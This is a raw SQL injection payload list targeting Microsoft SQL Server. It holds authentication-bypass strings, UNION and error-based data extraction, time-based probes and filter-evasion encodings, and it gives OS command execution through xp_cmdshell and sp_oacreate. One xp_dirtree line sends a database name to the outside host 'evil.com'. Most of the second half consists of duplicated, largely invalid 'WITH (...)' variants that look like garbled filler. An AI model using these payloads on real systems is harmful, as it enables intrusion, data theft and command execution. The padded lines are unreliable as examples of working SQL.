' OR '1'='1'--
' AND 1=1--
' OR 1=1/*
' OR 'x'='x
' OR 1=CONVERT(int,@@version)--
UNION ALL SELECT NULL--
UNION SELECT @@version,NULL--
UNION SELECT table_name,NULL FROM information_schema.tables--
UNION SELECT column_name,NULL FROM information_schema.columns--
UNION SELECT TOP 1 name,NULL FROM sys.databases--
AND 1=CONVERT(int,@@version)
OR 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))
AND 1=CONVERT(int,(SELECT CHAR(65)+CHAR(66)+CHAR(67)))
IF (1=1) WAITFOR DELAY '0:0:5'--
IF (SELECT COUNT(*) FROM sys.objects)>0 WAITFOR DELAY '0:0:2'--
SELECT @@version
SELECT system_user
SELECT db_name()
SELECT @@servername
SELECT session_user
SELECT current_user
SELECT name FROM sys.databases
SELECT table_name FROM information_schema.tables
SELECT column_name FROM information_schema.columns
SELECT * FROM information_schema.schemata
SELECT * FROM sys.objects WHERE type='U'
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT HAS_PERMS_BY_NAME(NULL, 'SERVER', 'IMPERSONATE ANY LOGIN')
EXEC xp_cmdshell 'whoami'
EXEC xp_dirtree 'C:\',1,1
EXEC xp_fileexist 'C:\Windows\System32\drivers\etc\hosts'
EXEC xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion','ProductName'
DECLARE @o int EXEC sp_oacreate 'wscript.shell',@o out EXEC sp_oamethod @o,'run',NULL,'cmd /c ver'
SELECT * FROM OPENROWSET('SQLNCLI','Server=.;Trusted_Connection=yes;','SELECT @@version')
'/**/OR/**/1=1--
'%0AOR%0A1=1--
'%09UNION%09SELECT%09@@version--
'/*!50000OR*/1=1--
0x27204f5220313d312d2d
0x2720554e494f4e2053454c45437420312d2d
' OR 'adm'+'in'='admin'--
' UNION SELECT 'ver'+'sion','db'+'name'--
' oR 1=1--
' uNiOn sElEcT @@version--
'%09OR%091=1--
'%0AUNION%0ASELECT%0A@@version--
'%0DOR%0D1=1--
'%00' OR 1=1--
'%00' UNION SELECT @@version--
; EXEC('SELECT @@version')--
; EXEC('SELECT name FROM sys.databases')--
EXEC('SELECT @@version')
EXEC sp_executesql N'SELECT @@version'
SELECT CAST((SELECT name FROM sys.databases FOR XML PATH('')) AS varchar(max))
EXEC xp_dirtree '\\'+CAST((SELECT TOP 1 name FROM sys.databases) AS varchar(8000))+'.evil.com\share'
SELECT * FROM sys.configurations
SELECT * FROM sys.dm_exec_connections
SELECT * FROM sys.dm_os_sys_info
EXEC msdb.dbo.sp_send_dbmail @recipients='test@example.com',@query='SELECT @@version'
EXEC msdb.dbo.sp_help_job
SELECT * FROM sys.assemblies
SELECT * FROM sys.assembly_files
SELECT CAST(@@version AS xml)
SELECT CONVERT(varbinary, @@version)
SELECT @@language
SELECT @@max_connections
SELECT @@servicename
SELECT * FROM sys.database_permissions
SELECT * FROM sys.server_permissions
SELECT AUTHENTICATE('test','test')
SELECT * FROM sys.sql_logins
SELECT * FROM sys.endpoints
EXEC xp_availablemedia
EXEC xp_subdirs 'C:\'
INSERT INTO table VALUES ('test'' OR 1=1--')
UPDATE table SET column='test'' OR 1=1--' WHERE id=1
SELECT * FROM sys.dm_exec_sessions
SELECT * FROM sys.dm_exec_requests
DECLARE @data varchar(8000) DECLARE c CURSOR FOR SELECT name FROM sys.databases OPEN c FETCH NEXT FROM c INTO @data
SELECT * FROM fn_virtualfilestats(1,1)
SELECT * FROM fn_trace_gettable('C:\trace.trc', default)
SELECT * FROM OPENJSON('{"test":"value"}')
BACKUP DATABASE master TO DISK = 'C:\backup.bak' WITH COPY_ONLY
RESTORE FILELISTONLY FROM DISK = 'C:\backup.bak'
DBCC CHECKDB('master')
DBCC USEROPTIONS
EXEC xp_servicecontrol 'querystate','SQLSERVERAGENT'
EXEC sp_who
EXEC sp_who2
SELECT * FROM OPENQUERY(LOCALSERVER,'SELECT @@version')
SELECT * FROM sys.stats
SELECT * FROM sys.dm_db_index_usage_stats
SELECT * FROM sys.partitions
SELECT * FROM sys.triggers
SELECT OBJECT_DEFINITION(OBJECT_ID('sys.databases'))
SELECT CRYPT_GEN_RANDOM(16)
SELECT * FROM sys.fulltext_catalogs
SELECT * FROM sys.policy_management_policies
SELECT * FROM sys.dm_server_audit_status
SELECT * FROM sys.dm_resource_governor_configuration
SELECT * FROM sys.query_store_runtime_stats
SELECT * FROM sys.tables WHERE temporal_type <> 0
SELECT * FROM sys.tables WHERE is_node = 1 OR is_edge = 1
SELECT * FROM sys.column_encryption_keys
SELECT * FROM sys.external_libraries
SELECT * FROM sys.filetables
SELECT * FROM sys.ledger_table_history

' OR 1=1ᅴ--
' OR 1=1℅--
' OR 1=1⁣--
' OR 1=1᠁--
' OR 1=1%EF%BC%8D%EF%BC%8D (Fullwidth hyphen)
' OR 1=1%EF%B9%A3 (Arabic semicolon)
' OR 1=1%EF%BB%BF (BOM character)
' OR 1=0x1--
' OR 1=3-2--
' OR 1=1|1--
' OR 1=1^0--
' OR 1=1&1--
' OR 1=~0--
' OR 1=1<<0--
' OR 1=1>>0--
' OR JSON_VALUE('{"a":1}','$.a')=1--
' OR ARRAY[1,2,3][1]=2--
' OR 1=REPLACE(1,0,1)--
' OR 1=ASCII(CHAR(49))--
' OR 1=UNICODE(N'1')--
' OR 1=AT TIME ZONE 'UTC'--
' OR 1=SWITCHOFFSET(GETDATE(),'+00:00')--
' OR 1=1 COLLATE SQL_Latin1_General_CP1_CI_AS--
' OR 'a'='A' COLLATE Latin1_General_BIN--
' OR 1=ROW_NUMBER() OVER(ORDER BY 1)--
' OR 1=RANK() OVER(ORDER BY 1)--
' OR 1=(SELECT 1 FROM (SELECT 1 AS x) AS src PIVOT(MAX(x) FOR x IN([1])) AS pvt)--
' OR 1=(SELECT TOP 1 1 FROM sys.objects OUTER APPLY sys.fn_helpcollations())--
' OR 1=PARTITION(1 BY 1)--
' OR 1=NEXT VALUE FOR seq_name--
' OR 1=1 FOR SYSTEM_TIME ALL--
' OR 1=SHORTEST_PATH((:A)-[:R]->(:B))--
' OR 1=PREDICT(MODEL=model_name,DATA=1)--
' OR 1=EXTERNAL_SCRIPT('R','1+1')--
' OR 1=geometry::STGeomFromText('POINT (1 1)',0).STX--
' OR 1=CONTAINS(column,'"1"')--
' OR 1=1 IN SEMANTICKEYPHRASETABLE(table,column,'1').keyphrase--
' OR 1=GET_FILESTREAM_TRANSACTION_CONTEXT()--
' OR 1=RECEIVE(1 FROM queue)--
' OR 1=1 OPTION(USE HINT('FORCE_LEGACY_CARDINALITY_ESTIMATION'))--
' OR 1=1 WITH (MEMORY_OPTIMIZED=ON)--
' OR 1=1 WITH (COLUMNSTORE)--
' OR 1=1 WITH (SCHEMA_ONLY)--
' OR 1=COMPRESS('1')--
' OR 1=ENCRYPTBYKEY(KEY_GUID('key_name'),'1')--
' OR 1=1 WITH (MASKING=FUNCTION 'default()')--
' OR 1=1 WITH (MASK=OFF)--
' OR 1=1 WITH (SECURITY POLICY=OFF)--
' OR 1=1 WITH (LEDGER=ON)--
' OR 1=1 WITH (HYPERSCALE=ON)--
' OR 1=1 WITH (REMOTE_DATA_ARCHIVE=ON)--
' OR 1=1 WITH (DATA_SOURCE=external_source)--
' OR 1=1 WITH (PARTITION=1)--
' OR 1=1 WITH (CHANGE_TRACKING_CONTEXT(1))--
' OR 1=1 WITH (CDC=ON)--
' OR 1=1 WITH (SYSTEM_VERSIONING=OFF)--
' OR 1=1 WITH (NODE=ON)--
' OR 1=1 WITH (EDGE=ON)--
' OR 1=JSON_PATH_EXISTS('{"a":1}','$.a')--
' OR 1=JSON_MODIFY('{"a":1}','$.a',2)--
' OR 1=1 FOR XML PATH(''), ROOT('root')--
' OR 1=1 WITH XMLNAMESPACES('uri' AS ns)--
' OR 1=1 WITH (XML INDEX=xml_index)--
' OR 1=1 WITH (XMLSCHEMA('uri','schema'))--
' OR 1=1 WITH (XML DML=ON)--
' OR 1=1 WITH (XML VIEW=ON)--
' OR 1=1 WITH (XML COLLECTION=collection)--
' OR 1=1 WITH (XML TEMPLATE=template)--
' OR 1=1 WITH (XML LOB=ON)--
' OR 1=1 WITH (XML SCHEMA COLLECTION=collection)--
' OR 1=1 WITH (XML INDEX VIEW=view)--
' OR 1=1 WITH (XML NAMESPACE=namespace)--
' OR 1=1 WITH (XML DATA TYPE=type)--
' OR 1=1 WITH (XML FORMAT=format)--
' OR 1=1 WITH (XML STORAGE=storage)--
' OR 1=1 WITH (XML PROCESSING=processing)--
' OR 1=1 WITH (XML VALIDATION=validation)--
' OR 1=1 WITH (XML SERIALIZATION=serialization)--
' OR 1=1 WITH (XML COMPRESSION=compression)--
' OR 1=1 WITH (XML ENCRYPTION=encryption)--
' OR 1=1 WITH (XML SIGNATURE=signature)--
' OR 1=1 WITH (XML TRANSFORM=transform)--
' OR 1=1 WITH (XML QUERY=query)--
' OR 1=1 WITH (XML VALUE=value)--
' OR 1=1 WITH (XML EXIST=exist)--
' OR 1=1 WITH (XML MODIFY=modify)--
' OR 1=1 WITH (XML NODES=nodes)--
' OR 1=1 WITH (XML OPENXML=openxml)--
' OR 1=1 WITH (XML BULK LOAD=bulkload)--
' OR 1=1 WITH (XML FOR=for)--
' OR 1=1 WITH (XML AUTO=auto)--
' OR 1=1 WITH (XML EXPLICIT=explicit)--
' OR 1=1 WITH (XML RAW=raw)--
' OR 1=1 WITH (XML PATH=path)--
' OR 1=1 WITH (XML ELEMENTS=elements)--
' OR 1=1 WITH (XML BINARY BASE64=binarybase64)--
' OR 1=1 WITH (XML TYPE=type)--
' OR 1=1 WITH (XMLSCHEMA=xmlschema)--
' OR 1=1 WITH (XMLDATA=xmldata)--
' OR 1=1 WITH (XMLNAMESPACES=xmlnamespaces)--
' OR 1=1 WITH (XSINIL=xsinil)--
' OR 1=1 WITH (ROOT=root)--
' OR 1=1 WITH (BINARY BASE64=binarybase64)--
' OR 1=1 WITH (TRUNCATE_YEAR=truncateyear)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (DATE_FORMAT=dateformat)--
' OR 1=1 WITH (TIME_FORMAT=timeformat)--
' OR 1=1 WITH (DATETIME_FORMAT=datetimeformat)--
' OR 1=1 WITH (TIMESTAMP_FORMAT=timestampformat)--
' OR 1=1 WITH (DECIMAL=decimal)--
' OR 1=1 WITH (FLOAT=float)--
' OR 1=1 WITH (REAL=real)--
' OR 1=1 WITH (MONEY=money)--
' OR 1=1 WITH (SMALLMONEY=smallmoney)--
' OR 1=1 WITH (NUMERIC=numeric)--
' OR 1=1 WITH (SMALLINT=smallint)--
' OR 1=1 WITH (TINYINT=tinyint)--
' OR 1=1 WITH (BIT=bit)--
' OR 1=1 WITH (BIGINT=bigint)--
' OR 1=1 WITH (INT=int)--
' OR 1=1 WITH (CHAR=char)--
' OR 1=1 WITH (VARCHAR=varchar)--
' OR 1=1 WITH (TEXT=text)--
' OR 1=1 WITH (NCHAR=nchar)--
' OR 1=1 WITH (NVARCHAR=nvarchar)--
' OR 1=1 WITH (NTEXT=ntext)--
' OR 1=1 WITH (BINARY=binary)--
' OR 1=1 WITH (VARBINARY=varbinary)--
' OR 1=1 WITH (IMAGE=image)--
' OR 1=1 WITH (UNIQUEIDENTIFIER=uniqueidentifier)--
' OR 1=1 WITH (SQL_VARIANT=sql_variant)--
' OR 1=1 WITH (TABLE=table)--
' OR 1=1 WITH (CURSOR=cursor)--
' OR 1=1 WITH (TIMESTAMP=timestamp)--
' OR 1=1 WITH (HIERARCHYID=hierarchyid)--
' OR 1=1 WITH (GEOMETRY=geometry)--
' OR 1=1 WITH (GEOGRAPHY=geography)--
' OR 1=1 WITH (DATETIME=datetime)--
' OR 1=1 WITH (SMALLDATETIME=smalldatetime)--
' OR 1=1 WITH (DATETIME2=datetime2)--
' OR 1=1 WITH (DATETIMEOFFSET=datetimeoffset)--
' OR 1=1 WITH (DATE=date)--
' OR 1=1 WITH (TIME=time)--
' OR 1=1 WITH (DATETRUNC=datetrunc)--
' OR 1=1 WITH (EOMONTH=eomonth)--
' OR 1=1 WITH (SWITCHOFFSET=switchoffset)--
' OR 1=1 WITH (TODATETIMEOFFSET=todatetimeoffset)--
' OR 1=1 WITH (AT TIME ZONE=attimezone)--
' OR 1=1 WITH (ISDATE=isdate)--
' OR 1=1 WITH (DAY=day)--
' OR 1=1 WITH (MONTH=month)--
' OR 1=1 WITH (YEAR=year)--
' OR 1=1 WITH (DATENAME=datename)--
' OR 1=1 WITH (DATEPART=datepart)--
' OR 1=1 WITH (GETDATE=getdate)--
' OR 1=1 WITH (GETUTCDATE=getutcdate)--
' OR 1=1 WITH (SYSDATETIME=sysdatetime)--
' OR 1=1 WITH (SYSUTCDATETIME=sysutcdatetime)--
' OR 1=1 WITH (SYSDATETIMEOFFSET=sysdatetimeoffset)--
' OR 1=1 WITH (CURRENT_TIMESTAMP=current_timestamp)--
' OR 1=1 WITH (CURRENT_TIMEZONE=current_timezone)--
' OR 1=1 WITH (DATEDIFF=datediff)--
' OR 1=1 WITH (DATEADD=dateadd)--
' OR 1=1 WITH (ISNULL=isnull)--
' OR 1=1 WITH (NULLIF=nullif)--
' OR 1=1 WITH (COALESCE=coalesce)--
' OR 1=1 WITH (IIF=iif)--
' OR 1=1 WITH (CHOOSE=choose)--
' OR 1=1 WITH (TRY_CAST=try_cast)--
' OR 1=1 WITH (TRY_CONVERT=try_convert)--
' OR 1=1 WITH (TRY_PARSE=try_parse)--
' OR 1=1 WITH (PARSE=parse)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (CONCAT=concat)--
' OR 1=1 WITH (CONCAT_WS=concat_ws)--
' OR 1=1 WITH (STRING_AGG=string_agg)--
' OR 1=1 WITH (STRING_SPLIT=string_split)--
' OR 1=1 WITH (STRING_ESCAPE=string_escape)--
' OR 1=1 WITH (TRANSLATE=translate)--
' OR 1=1 WITH (TRIM=trim)--
' OR 1=1 WITH (LTRIM=ltrim)--
' OR 1=1 WITH (RTRIM=rtrim)--
' OR 1=1 WITH (UPPER=upper)--
' OR 1=1 WITH (LOWER=lower)--
' OR 1=1 WITH (REVERSE=reverse)--
' OR 1=1 WITH (REPLICATE=replicate)--
' OR 1=1 WITH (SPACE=space)--
' OR 1=1 WITH (STUFF=stuff)--
' OR 1=1 WITH (SUBSTRING=substring)--
' OR 1=1 WITH (LEFT=left)--
' OR 1=1 WITH (RIGHT=right)--
' OR 1=1 WITH (CHARINDEX=charindex)--
' OR 1=1 WITH (PATINDEX=patindex)--
' OR 1=1 WITH (REPLACE=replace)--
' OR 1=1 WITH (STR=str)--
' OR 1=1 WITH (ASCII=ascii)--
' OR 1=1 WITH (UNICODE=unicode)--
' OR 1=1 WITH (NCHAR=nchar)--
' OR 1=1 WITH (CHAR=char)--
' OR 1=1 WITH (SOUNDEX=soundex)--
' OR 1=1 WITH (DIFFERENCE=difference)--
' OR 1=1 WITH (QUOTENAME=quotename)--
' OR 1=1 WITH (PARSENAME=parsename)--
' OR 1=1 WITH (ISNUMERIC=isnumeric)--
' OR 1=1 WITH (ISJSON=isjson)--
' OR 1=1 WITH (JSON_VALUE=json_value)--
' OR 1=1 WITH (JSON_QUERY=json_query)--
' OR 1=1 WITH (JSON_MODIFY=json_modify)--
' OR 1=1 WITH (OPENJSON=openjson)--
' OR 1=1 WITH (FOR JSON=for_json)--
' OR 1=1 WITH (JSON_PATH_EXISTS=json_path_exists)--
' OR 1=1 WITH (JSON_ARRAY=json_array)--
' OR 1=1 WITH (JSON_OBJECT=json_object)--
' OR 1=1 WITH (JSON_ARRAY_AGG=json_array_agg)--
' OR 1=1 WITH (JSON_OBJECT_AGG=json_object_agg)--
' OR 1=1 WITH (IS_XML=is_xml)--
' OR 1=1 WITH (XML_VALUE=xml_value)--
' OR 1=1 WITH (XML_QUERY=xml_query)--
' OR 1=1 WITH (XML_EXIST=xml_exist)--
' OR 1=1 WITH (XML_MODIFY=xml_modify)--
' OR 1=1 WITH (XML_NODES=xml_nodes)--
' OR 1=1 WITH (XML_OPENXML=xml_openxml)--
' OR 1=1 WITH (XML_BULKLOAD=xml_bulkload)--
' OR 1=1 WITH (FOR XML=for_xml)--
' OR 1=1 WITH (XML_SCHEMA=xml_schema)--
' OR 1=1 WITH (XML_SCHEMA_NAMESPACE=xml_schema_namespace)--
' OR 1=1 WITH (XML_DATATYPE=xml_datatype)--
' OR 1=1 WITH (XML_INDEX=xml_index)--
' OR 1=1 WITH (XML_VIEW=xml_view)--
' OR 1=1 WITH (XML_COLLECTION=xml_collection)--
' OR 1=1 WITH (XML_TEMPLATE=xml_template)--
' OR 1=1 WITH (XML_LOB=xml_lob)--
' OR 1=1 WITH (XML_SCHEMA_COLLECTION=xml_schema_collection)--
' OR 1=1 WITH (XML_INDEX_VIEW=xml_index_view)--
' OR 1=1 WITH (XML_NAMESPACE=xml_namespace)--
' OR 1=1 WITH (XML_DATA_TYPE=xml_data_type)--
' OR 1=1 WITH (XML_FORMAT=xml_format)--
' OR 1=1 WITH (XML_STORAGE=xml_storage)--
' OR 1=1 WITH (XML_PROCESSING=xml_processing)--
' OR 1=1 WITH (XML_VALIDATION=xml_validation)--
' OR 1=1 WITH (XML_SERIALIZATION=xml_serialization)--
' OR 1=1 WITH (XML_COMPRESSION=xml_compression)--
' OR 1=1 WITH (XML_ENCRYPTION=xml_encryption)--
' OR 1=1 WITH (XML_SIGNATURE=xml_signature)--
' OR 1=1 WITH (XML_TRANSFORM=xml_transform)--
' OR 1=1 WITH (XML_QUERY=xml_query)--
' OR 1=1 WITH (XML_VALUE=xml_value)--
' OR 1=1 WITH (XML_EXIST=xml_exist)--
' OR 1=1 WITH (XML_MODIFY=xml_modify)--
' OR 1=1 WITH (XML_NODES=xml_nodes)--
' OR 1=1 WITH (XML_OPENXML=xml_openxml)--
' OR 1=1 WITH (XML_BULKLOAD=xml_bulkload)--
' OR 1=1 WITH (XML_FOR=xml_for)--
' OR 1=1 WITH (XML_AUTO=xml_auto)--
' OR 1=1 WITH (XML_EXPLICIT=xml_explicit)--
' OR 1=1 WITH (XML_RAW=xml_raw)--
' OR 1=1 WITH (XML_PATH=xml_path)--
' OR 1=1 WITH (XML_ELEMENTS=xml_elements)--
' OR 1=1 WITH (XML_BINARY_BASE64=xml_binary_base64)--
' OR 1=1 WITH (XML_TYPE=xml_type)--
' OR 1=1 WITH (XMLSCHEMA=xmlschema)--
' OR 1=1 WITH (XMLDATA=xmldata)--
' OR 1=1 WITH (XMLNAMESPACES=xmlnamespaces)--
' OR 1=1 WITH (XSINIL=xsinil)--
' OR 1=1 WITH (ROOT=root)--
' OR 1=1 WITH (BINARY_BASE64=binary_base64)--
' OR 1=1 WITH (TRUNCATE_YEAR=truncate_year)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (DATE_FORMAT=date_format)--
' OR 1=1 WITH (TIME_FORMAT=time_format)--
' OR 1=1 WITH (DATETIME_FORMAT=datetime_format)--
' OR 1=1 WITH (TIMESTAMP_FORMAT=timestamp_format)--
' OR 1=1 WITH (DECIMAL=decimal)--
' OR 1=1 WITH (FLOAT=float)--
' OR 1=1 WITH (REAL=real)--
' OR 1=1 WITH (MONEY=money)--
' OR 1=1 WITH (SMALLMONEY=smallmoney)--
' OR 1=1 WITH (NUMERIC=numeric)--
' OR 1=1 WITH (SMALLINT=smallint)--
' OR 1=1 WITH (TINYINT=tinyint)--
' OR 1=1 WITH (BIT=bit)--
' OR 1=1 WITH (BIGINT=bigint)--
' OR 1=1 WITH (INT=int)--
' OR 1=1 WITH (CHAR=char)--
' OR 1=1 WITH (VARCHAR=varchar)--
' OR 1=1 WITH (TEXT=text)--
' OR 1=1 WITH (NCHAR=nchar)--
' OR 1=1 WITH (NVARCHAR=nvarchar)--
' OR 1=1 WITH (NTEXT=ntext)--
' OR 1=1 WITH (BINARY=binary)--
' OR 1=1 WITH (VARBINARY=varbinary)--
' OR 1=1 WITH (IMAGE=image)--
' OR 1=1 WITH (UNIQUEIDENTIFIER=uniqueidentifier)--
' OR 1=1 WITH (SQL_VARIANT=sql_variant)--
' OR 1=1 WITH (TABLE=table)--
' OR 1=1 WITH (CURSOR=cursor)--
' OR 1=1 WITH (TIMESTAMP=timestamp)--
' OR 1=1 WITH (HIERARCHYID=hierarchyid)--
' OR 1=1 WITH (GEOMETRY=geometry)--
' OR 1=1 WITH (GEOGRAPHY=geography)--
' OR 1=1 WITH (DATETIME=datetime)--
' OR 1=1 WITH (SMALLDATETIME=smalldatetime)--
' OR 1=1 WITH (DATETIME2=datetime2)--
' OR 1=1 WITH (DATETIMEOFFSET=datetimeoffset)--
' OR 1=1 WITH (DATE=date)--
' OR 1=1 WITH (TIME=time)--
' OR 1=1 WITH (DATETRUNC=datetrunc)--
' OR 1=1 WITH (EOMONTH=eomonth)--
' OR 1=1 WITH (SWITCHOFFSET=switchoffset)--
' OR 1=1 WITH (TODATETIMEOFFSET=todatetimeoffset)--
' OR 1=1 WITH (AT TIME ZONE=at_time_zone)--
' OR 1=1 WITH (ISDATE=isdate)--
' OR 1=1 WITH (DAY=day)--
' OR 1=1 WITH (MONTH=month)--
' OR 1=1 WITH (YEAR=year)--
' OR 1=1 WITH (DATENAME=datename)--
' OR 1=1 WITH (DATEPART=datepart)--
' OR 1=1 WITH (GETDATE=getdate)--
' OR 1=1 WITH (GETUTCDATE=getutcdate)--
' OR 1=1 WITH (SYSDATETIME=sysdatetime)--
' OR 1=1 WITH (SYSUTCDATETIME=sysutcdatetime)--
' OR 1=1 WITH (SYSDATETIMEOFFSET=sysdatetimeoffset)--
' OR 1=1 WITH (CURRENT_TIMESTAMP=current_timestamp)--
' OR 1=1 WITH (CURRENT_TIMEZONE=current_timezone)--
' OR 1=1 WITH (DATEDIFF=datediff)--
' OR 1=1 WITH (DATEADD=dateadd)--
' OR 1=1 WITH (ISNULL=isnull)--
' OR 1=1 WITH (NULLIF=nullif)--
' OR 1=1 WITH (COALESCE=coalesce)--
' OR 1=1 WITH (IIF=iif)--
' OR 1=1 WITH (CHOOSE=choose)--
' OR 1=1 WITH (TRY_CAST=try_cast)--
' OR 1=1 WITH (TRY_CONVERT=try_convert)--
' OR 1=1 WITH (TRY_PARSE=try_parse)--
' OR 1=1 WITH (PARSE=parse)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (CONCAT=concat)--
' OR 1=1 WITH (CONCAT_WS=concat_ws)--
' OR 1=1 WITH (STRING_AGG=string_agg)--
' OR 1=1 WITH (STRING_SPLIT=string_split)--
' OR 1=1 WITH (STRING_ESCAPE=string_escape)--
' OR 1=1 WITH (TRANSLATE=translate)--
' OR 1=1 WITH (TRIM=trim)--
' OR 1=1 WITH (LTRIM=ltrim)--
' OR 1=1 WITH (RTRIM=rtrim)--
' OR 1=1 WITH (UPPER=upper)--
' OR 1=1 WITH (LOWER=lower)--
' OR 1=1 WITH (REVERSE=reverse)--
' OR 1=1 WITH (REPLICATE=replicate)--
' OR 1=1 WITH (SPACE=space)--
' OR 1=1 WITH (STUFF=stuff)--
' OR 1=1 WITH (SUBSTRING=substring)--
' OR 1=1 WITH (LEFT=left)--
' OR 1=1 WITH (RIGHT=right)--
' OR 1=1 WITH (CHARINDEX=charindex)--
' OR 1=1 WITH (PATINDEX=patindex)--
' OR 1=1 WITH (REPLACE=replace)--
' OR 1=1 WITH (STR=str)--
' OR 1=1 WITH (ASCII=ascii)--
' OR 1=1 WITH (UNICODE=unicode)--
' OR 1=1 WITH (NCHAR=nchar)--
' OR 1=1 WITH (CHAR=char)--
' OR 1=1 WITH (SOUNDEX=soundex)--
' OR 1=1 WITH (DIFFERENCE=difference)--
' OR 1=1 WITH (QUOTENAME=quotename)--
' OR 1=1 WITH (PARSENAME=parsename)--
' OR 1=1 WITH (ISNUMERIC=isnumeric)--
' OR 1=1 WITH (ISJSON=isjson)--
' OR 1=1 WITH (JSON_VALUE=json_value)--
' OR 1=1 WITH (JSON_QUERY=json_query)--
' OR 1=1 WITH (JSON_MODIFY=json_modify)--
' OR 1=1 WITH (OPENJSON=openjson)--
' OR 1=1 WITH (FOR JSON=for_json)--
' OR 1=1 WITH (JSON_PATH_EXISTS=json_path_exists)--
' OR 1=1 WITH (JSON_ARRAY=json_array)--
' OR 1=1 WITH (JSON_OBJECT=json_object)--
' OR 1=1 WITH (JSON_ARRAY_AGG=json_array_agg)--
' OR 1=1 WITH (JSON_OBJECT_AGG=json_object_agg)--
' OR 1=1 WITH (IS_XML=is_xml)--
' OR 1=1 WITH (XML_VALUE=xml_value)--
' OR 1=1 WITH (XML_QUERY=xml_query)--
' OR 1=1 WITH (XML_EXIST=xml_exist)--
' OR 1=1 WITH (XML_MODIFY=xml_modify)--
' OR 1=1 WITH (XML_NODES=xml_nodes)--
' OR 1=1 WITH (XML_OPENXML=xml_openxml)--
' OR 1=1 WITH (XML_BULKLOAD=xml_bulkload)--
' OR 1=1 WITH (FOR XML=for_xml)--
' OR 1=1 WITH (XML_SCHEMA=xml_schema)--
' OR 1=1 WITH (XML_SCHEMA_NAMESPACE=xml_schema_namespace)--
' OR 1=1 WITH (XML_DATATYPE=xml_datatype)--
' OR 1=1 WITH (XML_INDEX=xml_index)--
' OR 1=1 WITH (XML_VIEW=xml_view)--
' OR 1=1 WITH (XML_COLLECTION=xml_collection)--
' OR 1=1 WITH (XML_TEMPLATE=xml_template)--
' OR 1=1 WITH (XML_LOB=xml_lob)--
' OR 1=1 WITH (XML_SCHEMA_COLLECTION=xml_schema_collection)--
' OR 1=1 WITH (XML_INDEX_VIEW=xml_index_view)--
' OR 1=1 WITH (XML_NAMESPACE=xml_namespace)--
' OR 1=1 WITH (XML_DATA_TYPE=xml_data_type)--
' OR 1=1 WITH (XML_FORMAT=xml_format)--
' OR 1=1 WITH (XML_STORAGE=xml_storage)--
' OR 1=1 WITH (XML_PROCESSING=xml_processing)--
' OR 1=1 WITH (XML_VALIDATION=xml_validation)--
' OR 1=1 WITH (XML_SERIALIZATION=xml_serialization)--
' OR 1=1 WITH (XML_COMPRESSION=xml_compression)--
' OR 1=1 WITH (XML_ENCRYPTION=xml_encryption)--
' OR 1=1 WITH (XML_SIGNATURE=xml_signature)--
' OR 1=1 WITH (XML_TRANSFORM=xml_transform)--
' OR 1=1 WITH (XML_QUERY=xml_query)--
' OR 1=1 WITH (XML_VALUE=xml_value)--
' OR 1=1 WITH (XML_EXIST=xml_exist)--
' OR 1=1 WITH (XML_MODIFY=xml_modify)--
' OR 1=1 WITH (XML_NODES=xml_nodes)--
' OR 1=1 WITH (XML_OPENXML=xml_openxml)--
' OR 1=1 WITH (XML_BULKLOAD=xml_bulkload)--
' OR 1=1 WITH (XML_FOR=xml_for)--
' OR 1=1 WITH (XML_AUTO=xml_auto)--
' OR 1=1 WITH (XML_EXPLICIT=xml_explicit)--
' OR 1=1 WITH (XML_RAW=xml_raw)--
' OR 1=1 WITH (XML_PATH=xml_path)--
' OR 1=1 WITH (XML_ELEMENTS=xml_elements)--
' OR 1=1 WITH (XML_BINARY_BASE64=xml_binary_base64)--
' OR 1=1 WITH (XML_TYPE=xml_type)--
' OR 1=1 WITH (XMLSCHEMA=xmlschema)--
' OR 1=1 WITH (XMLDATA=xmldata)--
' OR 1=1 WITH (XMLNAMESPACES=xmlnamespaces)--
' OR 1=1 WITH (XSINIL=xsinil)--
' OR 1=1 WITH (ROOT=root)--
' OR 1=1 WITH (BINARY_BASE64=binary_base64)--
' OR 1=1 WITH (TRUNCATE_YEAR=truncate_year)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (DATE_FORMAT=date_format)--
' OR 1=1 WITH (TIME_FORMAT=time_format)--
' OR 1=1 WITH (DATETIME_FORMAT=datetime_format)--
' OR 1=1 WITH (TIMESTAMP_FORMAT=timestamp_format)--
' OR 1=1 WITH (DECIMAL=decimal)--
' OR 1=1 WITH (FLOAT=float)--
' OR 1=1 WITH (REAL=real)--
' OR 1=1 WITH (MONEY=money)--
' OR 1=1 WITH (SMALLMONEY=smallmoney)--
' OR 1=1 WITH (NUMERIC=numeric)--
' OR 1=1 WITH (SMALLINT=smallint)--
' OR 1=1 WITH (TINYINT=tinyint)--
' OR 1=1 WITH (BIT=bit)--
' OR 1=1 WITH (BIGINT=bigint)--
' OR 1=1 WITH (INT=int)--
' OR 1=1 WITH (CHAR=char)--
' OR 1=1 WITH (VARCHAR=varchar)--
' OR 1=1 WITH (TEXT=text)--
' OR 1=1 WITH (NCHAR=nchar)--
' OR 1=1 WITH (NVARCHAR=nvarchar)--
' OR 1=1 WITH (NTEXT=ntext)--
' OR 1=1 WITH (BINARY=binary)--
' OR 1=1 WITH (VARBINARY=varbinary)--
' OR 1=1 WITH (IMAGE=image)--
' OR 1=1 WITH (UNIQUEIDENTIFIER=uniqueidentifier)--
' OR 1=1 WITH (SQL_VARIANT=sql_variant)--
' OR 1=1 WITH (TABLE=table)--
' OR 1=1 WITH (CURSOR=cursor)--
' OR 1=1 WITH (TIMESTAMP=timestamp)--
' OR 1=1 WITH (HIERARCHYID=hierarchyid)--
' OR 1=1 WITH (GEOMETRY=geometry)--
' OR 1=1 WITH (GEOGRAPHY=geography)--
' OR 1=1 WITH (DATETIME=datetime)--
' OR 1=1 WITH (SMALLDATETIME=smalldatetime)--
' OR 1=1 WITH (DATETIME2=datetime2)--
' OR 1=1 WITH (DATETIMEOFFSET=datetimeoffset)--
' OR 1=1 WITH (DATE=date)--
' OR 1=1 WITH (TIME=time)--
' OR 1=1 WITH (DATETRUNC=datetrunc)--
' OR 1=1 WITH (EOMONTH=eomonth)--
' OR 1=1 WITH (SWITCHOFFSET=switchoffset)--
' OR 1=1 WITH (TODATETIMEOFFSET=todatetimeoffset)--
